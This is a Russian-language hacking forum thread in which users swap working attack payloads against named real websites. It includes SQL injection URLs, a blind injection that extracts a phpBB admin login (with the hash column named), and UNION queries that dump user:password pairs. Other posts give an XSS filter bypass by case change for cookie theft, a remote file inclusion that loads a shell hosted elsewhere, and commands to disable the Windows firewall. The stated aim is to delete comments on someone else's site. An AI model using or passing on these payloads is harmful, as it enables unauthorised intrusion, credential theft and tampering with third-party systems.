Загадочный SQL inj Вот такой SQL inj http://www.moscowfitness.ru/find.php?cname=bebebe' Долго не мог подобрать не одной таблицы, а потом попробовал вот так http://www.moscowfitness.ru/find.php?cname=bebebe' UNION select 1 FROM CLUBS/* и удивился. Вышло следующее Code: select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID MYSQL заявил, что "Table 'db10002m.clubs' doesn't exist" Как такое может быть? Для первой части запроса таблица CLUBS есть, а для второй уже нет. Или это так приведение к нижнему регистру влияет? p.s. Глобальная задача найти таблицу с комментариями и удалить один из комментариев.
Должно быть таблица clubs находится в другой бд. http://www.moscowfitness.ru/find.php?cname=bebebe'+or+1=if(ascii(substring((select+username+from+phpbb_users+limit+0,1),1,1))>=65,1,0)/* Если я не намудрил с запросом, то первый символ логина админа форума - 'A'. Дальше сам ) //наверно дальше будет 'dmin' ^^ Хеши лежат в колумне user_password
такой вопрос, есть скуля http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user+limit+0,1-- выводит admin,pass потом меняя limit выводим след записи.. можно ли как нибудь (не используя софта) сразу вывести все записи в браузер одним запросом п.с http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user-- выводит только первую п.п.с записей много
Если выводит по одной записи - нет. Можно, конечно, использовать group_concat(), но будет вывод только 1024 символов (по умолчанию)
Меня по этому поводу тоже мысль посетила, но в SQL запрос вывелся весь на экран и в нем нет явного задания БД для первой таблицы CLUBS select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID Если бы даже перед этим запросом выполнялся USE имя_бд то его действие распространялось и на вторую часть запроса. А доступ нужно получить не к форму а комментариям о фитнес-клубах. Т.е к основным таблицам сайта. А при "отсутствии" даже самой CLUBS подбирать название таблицы с комментами дело бесперспективное.
Всем доброго времени суток. Хотелось бы знать одну вещь: является ли www.site.ru/?n=1" уязвимым, если выдается ошибка You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2009-02-06 22:49:35", "***.***.***.***", 1) ON DUPLICATE KEY UPDATE page="/?n=1"", ' at line 1 и если да, то как подобрать кол-во таблиц. По этой ссылке http://forum.antichat.ru/thread43966.html говорится, что должна быть ошибка «The used SELECT statements have a different number of columns», но у меня выходит почти та же ошибка (за исключением server version for the right syntax to use near 'UNION%20SELECT%201,%202%20--","2009-02-06 ) ON DUPLI' at line 1) Может кто нить обьяснит дилетанту, что сие означает? ^_^
Zergius ты прав, это типичная sql иньекция. Советую при подборе полей использовать order by. На античате всё есть, юзай поиск. Удачи p.s.ну а если есть вопросы то задавай.
Здравствуйте Такой вопрос: каким образом можно узнать полный путь к тому или иному файлу Искал в гугле нашел вот Прошу помощи! http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,Server.MapPath(%22%22),3,4,5
пытаюсь вот таким образом,через ошибку тут magic_quotes on ************** Путь к файлу вообще как - нибудь можно узнать?через какую-либо функцию?Или запрос
Code: http://www.isj.ph.edu.ro/moodle/ Code: http://www.isj.ph.edu.ro/data/7/ советую прочитать https://forum.antichat.ru/showthread.php?p=462951 http://forum.antichat.ru/showthread.php?p=259132
подскажите, можно как-нибудь провети XSS если нельзя использовать слова "script" и "javastript"? (интересует отправка куков)
в смысле вот так? <%73cript>alert("hello");</%73cript> почемуто не работает( просто как текст выводиться, броузер не воспринимает это как тэги
так-с.. иногда прокатывает изменение регистра, типа <ScRipt> и JavaScript, а иногда, если, к примеру, вырезается слово "script" можно отправить "scrscriptipt", и после удаления слова "script" останется "script". Наверно, как-нибудь ещё можно
мухаха, изменение регистра помогло двиг там походу самопальный, и он не вырезает, а заменяет на **caractères interdits**, это по-французски
Помогите разобраться с пхп инъекциями плз Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал. Решил залить шел, залил шел на ломаную фтпшку и подставил этот url: index.php?cel=http://site.com/shell.txt Мне выдало текстовик. Попробовал так index.php?cel=http://site.com/shell Так же выдало текстовик Попробовал так index.php?cel=http://site.com/shell.php Вылазит шел доступ для сайта на котором залит шел Подскажите пожалуйста решение)
Народ, подскажите пожалуйста как отрубить microsoft firewall? - после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))
net stop - мало, надо:net stop SharedAccess или В реестре поставь тип запуска отключен и перебутай винду =)
